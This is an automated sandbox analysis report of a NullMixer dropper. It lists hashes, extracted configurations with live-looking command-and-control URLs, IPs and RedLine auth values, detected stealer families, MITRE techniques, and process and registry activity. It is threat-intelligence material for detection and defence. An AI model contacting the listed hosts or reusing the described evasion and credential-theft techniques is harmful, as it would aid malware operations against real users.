fabookie | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Analysis

max time kernel
88s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-11-2024 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Size

7.1MB
MD5

2b01f663d5244764e8c2d164d3345fd6
SHA1

2b0dfcc018a5da0f140352bd114fb0f5e9abdfc3
SHA256

1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d
SHA512

2c7dd219673800320e3432ff6d8d2e5c2c3ae60a5f5960097d16ff79f385186ce13a81ea5a2b3d17652161d55ea552712f73d2d154b377fa74ec10043469dab4
SSDEEP

196608:x1LUCg3xjX8jOOU62TdXIGVlgJZhNSJWSCumPm3B:xNdgVMjRD2TCWler32PB

Malware Config

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

nullmixer

http://mooorni.xyz/

Extracted

Family

redline

Botnet

media18

91.121.67.60:2151

Attributes

auth_value
e37d5065561884bb54c8ed1baa6de446

Extracted

Family

redline

Botnet

fuck1

135.181.129.119:4805

Attributes

auth_value
b69102cdbd4afe2d3159f88fb6dac731

Extracted

Family

gcleaner

ppp-gl.biz

45.9.20.13

Signatures

Detect Fabookie payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon201629b9d021e.exe	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Fabookie family
fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
Nullmixer family
nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Onlylogger family
onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Privateloader family
privateloader
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V1 payload 1 IoCs

Processes:

resource	yara_rule
behavioral24/memory/5108-267-0x0000000000400000-0x00000000016FB000-memory.dmp	family_raccoon_v1

Raccoon family
raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral24/memory/2040-188-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral24/memory/2600-197-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
behavioral24/memory/2040-188-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat
behavioral24/memory/2600-197-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Socelars family
socelars

Socelars payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\Mon20c36d61c41847b17.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

OnlyLogger payload 1 IoCs

Processes:

resource	yara_rule
behavioral24/memory/1468-268-0x0000000000400000-0x0000000002DBD000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral24/memory/4656-266-0x0000000000400000-0x0000000002E10000-memory.dmp	family_vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3780 powershell.exe

pid	process
3780	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS8E2D4FB7\libcurlpp.dll	aspack_v212_v242

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeO5lIe.exEkPBhgOaGQk.exemshta.exemshta.exeMon201cb4c63ce4.exeMon20b09e42933548639.exemshta.exemshta.exemshta.exe1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exeMon200cb51003361.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	O5lIe.exE
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	kPBhgOaGQk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Mon201cb4c63ce4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Mon20b09e42933548639.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Mon200cb51003361.tmp

Executes dropped EXE 26 IoCs

Processes:

setup_install.exeMon201629b9d021e.exeMon201cb4c63ce4.exeMon200820e9da.exeMon2092b01a62c73.exeMon20e7747f4ca9880.exeMon20c36d61c41847b17.exeMon2009d34d832dfd1d9.exeMon200cb51003361.exeMon20b3dfc29da.exeMon2024c1cb997.exeMon206e4c938239.exeMon2050daa466f6f.exeMon209df24d5e8f7.exeMon204858e151.exeMon203223fed8a4266c.exeMon200cb51003361.tmpMon20b09e42933548639.exeMon200cb51003361.exeMon200cb51003361.tmpMon204858e151.exeMon206e4c938239.exeMon209df24d5e8f7.exeO5lIe.exEkPBhgOaGQk.exee58f642.exe

pid	process
2892	setup_install.exe
3224	Mon201629b9d021e.exe
2660	Mon201cb4c63ce4.exe
3900	Mon200820e9da.exe
4656	Mon2092b01a62c73.exe
4268	Mon20e7747f4ca9880.exe
3468	Mon20c36d61c41847b17.exe
5084	Mon2009d34d832dfd1d9.exe
4612	Mon200cb51003361.exe
5108	Mon20b3dfc29da.exe
2792	Mon2024c1cb997.exe
4012	Mon206e4c938239.exe
1468	Mon2050daa466f6f.exe
1444	Mon209df24d5e8f7.exe
2544	Mon204858e151.exe
1904	Mon203223fed8a4266c.exe
1608	Mon200cb51003361.tmp
2604	Mon20b09e42933548639.exe
4164	Mon200cb51003361.exe
4244	Mon200cb51003361.tmp
2040	Mon204858e151.exe
2600	Mon206e4c938239.exe
4604	Mon209df24d5e8f7.exe
3040	O5lIe.exE
3788	kPBhgOaGQk.exe
2384	e58f642.exe

Loads dropped DLL 11 IoCs

Processes:

setup_install.exeMon200cb51003361.tmpMon200cb51003361.tmpmsiexec.exemsiexec.exe

pid	process
2892	setup_install.exe
2892	setup_install.exe
2892	setup_install.exe
2892	setup_install.exe
2892	setup_install.exe
2892	setup_install.exe
1608	Mon200cb51003361.tmp
4244	Mon200cb51003361.tmp
3864	msiexec.exe
3944	msiexec.exe
3944	msiexec.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Blocklisted process makes network request 4 IoCs

Processes:

msiexec.exe

flow pid process

137 3864 msiexec.exe
169 3864 msiexec.exe
173 3864 msiexec.exe
175 3864 msiexec.exe

flow	pid	process
137	3864	msiexec.exe
169	3864	msiexec.exe
173	3864	msiexec.exe
175	3864	msiexec.exe

Drops Chrome extension 1 IoCs

Processes:

Mon20c36d61c41847b17.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json	Mon20c36d61c41847b17.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

90 pastebin.com
93 pastebin.com
31 iplogger.org
32 iplogger.org
33 iplogger.org
42 iplogger.org
89 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ip-api.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
90	pastebin.com
93	pastebin.com
31	iplogger.org
32	iplogger.org
33	iplogger.org
42	iplogger.org
89	pastebin.com

flow	ioc
22	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

Mon204858e151.exeMon206e4c938239.exeMon209df24d5e8f7.exe

description	pid	process	target process
PID 2544 set thread context of 2040	2544	Mon204858e151.exe	Mon204858e151.exe
PID 4012 set thread context of 2600	4012	Mon206e4c938239.exe	Mon206e4c938239.exe
PID 1444 set thread context of 4604	1444	Mon209df24d5e8f7.exe	Mon209df24d5e8f7.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
440	2892	WerFault.exe	setup_install.exe
3060	3900	WerFault.exe	Mon200820e9da.exe
4840	1468	WerFault.exe	Mon2050daa466f6f.exe
388	1468	WerFault.exe	Mon2050daa466f6f.exe
1996	1468	WerFault.exe	Mon2050daa466f6f.exe
4532	1468	WerFault.exe	Mon2050daa466f6f.exe
2860	4656	WerFault.exe	Mon2092b01a62c73.exe
448	1468	WerFault.exe	Mon2050daa466f6f.exe
808	1468	WerFault.exe	Mon2050daa466f6f.exe
3152	2384	WerFault.exe	e58f642.exe
4556	1468	WerFault.exe	Mon2050daa466f6f.exe
2340	1468	WerFault.exe	Mon2050daa466f6f.exe
4180	1468	WerFault.exe	Mon2050daa466f6f.exe
1552	1468	WerFault.exe	Mon2050daa466f6f.exe
864	1468	WerFault.exe	Mon2050daa466f6f.exe
4876	1468	WerFault.exe	Mon2050daa466f6f.exe
3984	1468	WerFault.exe	Mon2050daa466f6f.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Mon201cb4c63ce4.exeMon200cb51003361.tmpcmd.exekPBhgOaGQk.exetaskkill.execmd.exemshta.execmd.exemsiexec.exe1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.execmd.exeMon2050daa466f6f.execmd.exeMon209df24d5e8f7.execmd.exeMon20e7747f4ca9880.exeMon2024c1cb997.exeMon204858e151.execmd.execmd.exemshta.execmd.execmd.exeMon200cb51003361.tmpMon206e4c938239.exetaskkill.execmd.exesetup_install.execmd.execmd.exeMon20c36d61c41847b17.exeMon204858e151.execmd.exemshta.execmd.exepowershell.execmd.execmd.execmd.exeMon203223fed8a4266c.execmd.exeMon200cb51003361.execmd.execmd.execmd.exeMon2009d34d832dfd1d9.exee58f642.execmd.execmd.exeMon200cb51003361.exeMon20b3dfc29da.exeMon20b09e42933548639.exemshta.exemshta.exetaskkill.execmd.exeO5lIe.exEmsiexec.exemshta.execmd.execmd.execmd.exeMon200820e9da.exeMon2092b01a62c73.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon201cb4c63ce4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon200cb51003361.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kPBhgOaGQk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon2050daa466f6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon209df24d5e8f7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon20e7747f4ca9880.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon2024c1cb997.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon204858e151.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon200cb51003361.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon206e4c938239.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon20c36d61c41847b17.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon204858e151.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon203223fed8a4266c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon200cb51003361.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon2009d34d832dfd1d9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e58f642.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon200cb51003361.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon20b3dfc29da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon20b09e42933548639.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	O5lIe.exE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon200820e9da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mon2092b01a62c73.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Mon200820e9da.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon200820e9da.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon200820e9da.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon200820e9da.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2192 taskkill.exe
3776 taskkill.exe
1340 taskkill.exe

pid	process
2192	taskkill.exe
3776	taskkill.exe
1340	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133752381780387285"	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exechrome.exe

pid process

3780 powershell.exe
3780 powershell.exe
3780 powershell.exe
3780 powershell.exe
2928 chrome.exe
2928 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

2928 chrome.exe
2928 chrome.exe
2928 chrome.exe

pid	process
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
3780	powershell.exe
2928	chrome.exe
2928	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeMon20c36d61c41847b17.exeMon2009d34d832dfd1d9.exetaskkill.exetaskkill.exetaskkill.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeCreateTokenPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeAssignPrimaryTokenPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeLockMemoryPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeIncreaseQuotaPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeMachineAccountPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeTcbPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeSecurityPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeTakeOwnershipPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeLoadDriverPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeSystemProfilePrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeSystemtimePrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeProfSingleProcessPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeIncBasePriorityPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeCreatePagefilePrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeCreatePermanentPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeBackupPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeRestorePrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeShutdownPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeDebugPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeAuditPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeSystemEnvironmentPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeChangeNotifyPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeRemoteShutdownPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeUndockPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeSyncAgentPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeEnableDelegationPrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeManageVolumePrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeImpersonatePrivilege	3468	Mon20c36d61c41847b17.exe
Token: SeCreateGlobalPrivilege	3468	Mon20c36d61c41847b17.exe
Token: 31	3468	Mon20c36d61c41847b17.exe
Token: 32	3468	Mon20c36d61c41847b17.exe
Token: 33	3468	Mon20c36d61c41847b17.exe
Token: 34	3468	Mon20c36d61c41847b17.exe
Token: 35	3468	Mon20c36d61c41847b17.exe
Token: SeDebugPrivilege	5084	Mon2009d34d832dfd1d9.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	3776	taskkill.exe
Token: SeDebugPrivilege	1340	taskkill.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe
Token: SeCreatePagefilePrivilege	2928	chrome.exe
Token: SeShutdownPrivilege	2928	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

chrome.exe

pid	process
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe
2928	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exesetup_install.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4840 wrote to memory of 2892	4840	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	setup_install.exe
PID 4840 wrote to memory of 2892	4840	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	setup_install.exe
PID 4840 wrote to memory of 2892	4840	1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe	setup_install.exe
PID 2892 wrote to memory of 1500	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1500	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1500	2892	setup_install.exe	cmd.exe
PID 1500 wrote to memory of 3780	1500	cmd.exe	powershell.exe
PID 1500 wrote to memory of 3780	1500	cmd.exe	powershell.exe
PID 1500 wrote to memory of 3780	1500	cmd.exe	powershell.exe
PID 2892 wrote to memory of 1464	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1464	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1464	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3828	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3828	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 3828	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4176	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4176	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4176	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4088	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4088	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 4088	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 2692	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 2692	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 2692	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1920	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1920	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 1920	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 2552	2892	setup_install.exe	cmd.exe
PID 2892 wrote to memory of 2552	2892	setup_install.exe	cmd.exe
